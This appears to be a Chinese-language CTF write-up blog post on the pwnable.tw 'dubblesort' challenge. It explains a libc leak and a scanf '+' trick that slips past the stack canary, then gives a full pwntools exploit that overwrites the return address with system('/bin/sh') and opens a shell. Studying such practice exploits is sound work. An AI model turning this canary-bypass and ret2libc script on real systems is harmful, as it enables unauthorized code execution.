

<!DOCTYPE html>
<html lang="">
<head>
  


<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Pwnable.tw dubblesort [ An9Ela ]</title>

  <link rel="icon" href="/img/favicon.ico">


    <meta name="author" content="An9Ela">





  <link rel="alternate" href="/atom.xml " title="An9Ela" type="application/atom+xml">


  
    <link rel="stylesheet" href="/css/main.css">
  

<meta name="generator" content="Hexo 6.2.0"></head>
  <body data-theme="light" class="notransition">
    <script>
      const body = document.body;
      const data = body.getAttribute("data-theme");
      const initTheme = (state) => {
        if (state === "dark") {
          body.setAttribute("data-theme", "dark");
        } else if (state === "light") {
          body.removeAttribute("data-theme");
        } else {
          localStorage.setItem("theme", data);
        }
      };
   
      initTheme(localStorage.getItem("theme"));
      
      setTimeout(() => body.classList.remove("notransition"), 75);
    </script>
  <div class="navbar" role="navigation">
    <nav class="menu">
      <input type="checkbox" id="menu-trigger" class="menu-trigger" />
      <label for="menu-trigger">
        <span class="menu-icon">
          <svg
            xmlns="http://www.w3.org/2000/svg"
            width="24"
            height="24"
            viewBox="0 0 512 512"
          >
            <path
              d="M64,384H448V341.33H64Zm0-106.67H448V234.67H64ZM64,128v42.67H448V128Z"
            />
          </svg>
        </span>
      </label>
      <a id="mode">
        <svg
          class="mode-sunny"
          xmlns="http://www.w3.org/2000/svg"
          width="24"
          height="24"
          viewBox="0 0 512 512"
        >
          <title>LIGHT</title>
          <line
            x1="256"
            y1="48"
            x2="256"
            y2="96"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="256"
            y1="416"
            x2="256"
            y2="464"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="108.92"
            x2="369.14"
            y2="142.86"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="369.14"
            x2="108.92"
            y2="403.08"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="464"
            y1="256"
            x2="416"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="96"
            y1="256"
            x2="48"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="403.08"
            x2="369.14"
            y2="369.14"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="142.86"
            x2="108.92"
            y2="108.92"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <circle
            cx="256"
            cy="256"
            r="80"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
        </svg>
        <svg
          class="mode-moon"
          xmlns="http://www.w3.org/2000/svg"
          width="24"
          height="24"
          viewBox="0 0 512 512"
        >
          <title>DARK</title>
          <line
            x1="256"
            y1="48"
            x2="256"
            y2="96"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="256"
            y1="416"
            x2="256"
            y2="464"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="108.92"
            x2="369.14"
            y2="142.86"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="369.14"
            x2="108.92"
            y2="403.08"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="464"
            y1="256"
            x2="416"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="96"
            y1="256"
            x2="48"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="403.08"
            x2="369.14"
            y2="369.14"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="142.86"
            x2="108.92"
            y2="108.92"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <circle
            cx="256"
            cy="256"
            r="80"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
        </svg>
      </a>
      <div class="trigger">
        <div class="trigger-container">
          
            
            
            
            
            
            
            <a class="menu-link " href="/"> Home</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/about/"> About</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/archives/"> Archives</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/tags/"> Tags</a>
          
        </div>
      </div>
    </nav>
  </div>
  
<div class="wrapper post">
  <main class="page-content" aria-label="Content">
      <header class="header">
        
          <div class="tags">
            <a href="/tags/CTF/" class="tag"># CTF</a><a href="/tags/PWN/" class="tag"># PWN</a>
          </div>
        
        <h1 class="header-title" itemprop="headline">Pwnable.tw dubblesort</h1>
          <div class="post-meta">
            <time>Oct 14, 2020</time>
            <span itemprop="author">
              <span itemprop="name">An9Ela</span>
            </span>
          </div>
        </header>

          <div class="page-content"><h3 id="Pwnable-tw-dubblesort"><a href="#Pwnable-tw-dubblesort" class="headerlink" title="Pwnable.tw  dubblesort"></a>Pwnable.tw  dubblesort</h3><blockquote>
<p>最近总是想写点东西，想来想去还是pwnable.tw上的题目值得记录，因此准备写个series，就从200分的dubblesort开始吧😝</p>
</blockquote>
<span id="more"></span>
<p>32位的程序，题目名是dubblesort冒泡排序，先分析一波：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">__printf_chk(<span class="number">1</span>, (<span class="type">int</span>)<span class="string">&quot;What your name :&quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, &amp;buf, <span class="number">0x40</span>u);</span><br><span class="line">  __printf_chk(<span class="number">1</span>, (<span class="type">int</span>)<span class="string">&quot;Hello %s,How many numbers do you what to sort :&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>开始的name输入到stack上，read没有’\0’截断，因此可用来泄露栈里的数据，多为libc。</p>
<p>之后程序让我们输入sort number和number,这些数据都是存放在stack上的,然后执行sort()函数进行冒泡排序。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">__printf_chk(<span class="number">1</span>, (<span class="type">int</span>)<span class="string">&quot;Hello %s,How many numbers do you what to sort :&quot;</span>);</span><br><span class="line">__isoc99_scanf(<span class="string">&quot;%u&quot;</span>, &amp;v9);</span><br><span class="line">count = v9;</span><br><span class="line"><span class="keyword">if</span> ( v9 )</span><br><span class="line">&#123;</span><br><span class="line">  v4 = &amp;nums;</span><br><span class="line">  v5 = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">do</span></span><br><span class="line">  &#123;</span><br><span class="line">    __printf_chk(<span class="number">1</span>, (<span class="type">int</span>)<span class="string">&quot;Enter the %d number : &quot;</span>);</span><br><span class="line">    fflush(<span class="built_in">stdout</span>);</span><br><span class="line">    __isoc99_scanf(<span class="string">&quot;%u&quot;</span>, v4);</span><br><span class="line">    ++v5;</span><br><span class="line">    count = v9;</span><br><span class="line">    ++v4;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">while</span> ( v9 &gt; v5 );</span><br><span class="line">&#125;</span><br><span class="line">sort((<span class="type">unsigned</span> <span class="type">int</span> *)&amp;nums, count);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;Result :&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>由于输入的数量由我们控制，那就可以栈溢出了，难点在于程序开启了canary，因此我们要做的就是如何能够不改掉canary同时覆盖返回地址，并且在sort()后这些数据还能再对应的位置上(可能因为大小问题而被交换之类的)📍</p>
<p>在执行__isoc99_scanf(“%u”, v4);时，当我尝试输入一些非法的字符如’#’，由于”%u”表示接收数据格式为无符号的整形，因此视’#’为非法的字符，从而scanf执行失败，栈上对应的数据没有被修改，但也导致它留在了stdin里使得后面循环的scanf也无法正确执行，那有没有什么字符可以使得scanf视其为合法字符却不修改stack的数据呢?</p>
<p>网上查找一番了解到’+’和’-‘可以🎉。原因在于这两个符号用于定义正数和负数，当输入+4时会视为4，-4会视为无符号的0x100000000-4,因此当我们只输入’+’时，由于我们实际上什么也没输入，自然也就不会改写stack上的数据。</p>
<p>因此我们可以在canary前写入’0’,canary处写入’+’,cananry后面到ebp写str(0xf0000000)，ret_addr写system，然后写两个libc中’&#x2F;bin&#x2F;sh’的地址，这样构造的话sort()完其位置将不会因交换而改变（没有发生交换），从而能拿到flag🚩</p>
<p>EXP:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">DEBUG=<span class="number">0</span></span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"><span class="keyword">if</span> DEBUG:</span><br><span class="line">	<span class="comment"># r=process(&quot;./dubblesort&quot;,env=&#123;&quot;LD_PRELOAD&quot;:&quot;../libc_32.so.6&quot;&#125;)</span></span><br><span class="line">	p=process(<span class="string">&quot;./dubblesort&quot;</span>)</span><br><span class="line">	libc=ELF(<span class="string">&quot;/lib/i386-linux-gnu/libc.so.6&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p=remote(<span class="string">&quot;chall.pwnable.tw&quot;</span>,<span class="number">10101</span>)</span><br><span class="line">	libc=ELF(<span class="string">&quot;../libc_32.so.6&quot;</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">got_plt_offset = <span class="number">0x1b0000</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># leak libc address</span></span><br><span class="line">payload_1 = <span class="string">&quot;a&quot;</span>*<span class="number">24</span></span><br><span class="line">p.recv()</span><br><span class="line">p.sendline(payload_1)</span><br><span class="line">libc_addr = u32(p.recv()[<span class="number">30</span>:<span class="number">34</span>])-<span class="number">0xa</span></span><br><span class="line">libc_address = libc_addr - got_plt_offset</span><br><span class="line"><span class="comment"># libc_address=u32(p.recv(4))-0x1b3061</span></span><br><span class="line"></span><br><span class="line">info(<span class="string">&quot;libc: &quot;</span>+<span class="built_in">hex</span>(libc_address))</span><br><span class="line"></span><br><span class="line"><span class="comment"># p.recvuntil(&#x27;sort :&#x27;)</span></span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">35</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">24</span>):</span><br><span class="line">	p.recvuntil(<span class="string">&quot;number : &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;number : &quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;+&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">	p.recvuntil(<span class="string">&quot;number : &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(<span class="number">0xf0000000</span>))</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;number : &quot;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(libc.sym[<span class="string">&#x27;system&#x27;</span>]+libc_address))</span><br><span class="line">p.recvuntil(<span class="string">&quot;number : &quot;</span>)</span><br><span class="line"><span class="comment"># p.sendline(str(libc.sym[&#x27;system&#x27;]+libc_address+1))</span></span><br><span class="line">p.sendline(<span class="built_in">str</span>(libc_address+libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>).<span class="built_in">next</span>()))</span><br><span class="line">p.recvuntil(<span class="string">&quot;number : &quot;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(libc_address+libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>).<span class="built_in">next</span>()))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
</div>
          <nav class="post-nav">
    
    <a class="post-nav-item post-nav-prev" href="/2020/10/15/Pwnable_death_note/">
      <div class="nav-arrow">&lt;&nbsp;NEWER</div>
      <span class="post-title">Pwnable.tw death_note</span>
    </a>
    
    
    <a class="post-nav-item post-nav-next" href="/2020/10/12/DEFCON18_Quals_mario/">
      <div class="nav-arrow">OLDER&nbsp;&gt;</div>
      <span class="post-title">DEFCON2018_Quals_mario</span>
    </a>
    
  </nav>

   </main>
</div>

  <footer class="footer">
    <small class="footer_copyright">
      <div id="bottom-inner">
        © 2021 Site by An9Ela using
        <a target="_blank" rel="noopener" href="http://hexo.io">hexo blog framework</a>.
        <br>
        <p> Theme is <a href="https://github.com/dewjohn/hexo-theme-klise">Klise</a></p>
      </div>
    </small>
  </footer>
  
  

    
      <script src="/js/main.js"></script>
    
  
  <script>
    window.FPConfig = {
      delay: 0,
      ignoreKeywords: [],
      maxRPS: 3,
      hoverDelay: 50,
    };
  </script>
  <script defer src="https://cdn.jsdelivr.net/gh/gijo-varghese/flying-pages@2.1.2/flying-pages.min.js"></script>
</body>
</html>
